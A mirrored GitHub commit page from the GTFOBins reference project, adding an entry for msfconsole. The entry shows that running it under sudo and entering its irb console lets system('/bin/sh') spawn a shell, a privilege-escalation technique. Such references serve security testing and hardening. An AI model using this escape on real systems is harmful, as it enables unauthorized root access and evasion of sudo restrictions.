1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00

Add msfconsole

This commit is contained in:
Andrea Cardaci 2022-12-16 14:48:10 +01:00 committed by GitHub
commit 9058ed555f
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

14
_gtfobins/msfconsole.md Normal file
View File

@ -0,0 +1,14 @@
---
description: This allows to spawn a [`ruby`](/gtfobins/ruby/) interpreter.
functions:
shell:
- code: |
sudo msfconsole
msf6 > irb
>> system("/bin/sh")
sudo:
- code: |
sudo msfconsole
msf6 > irb
>> system("/bin/sh")
---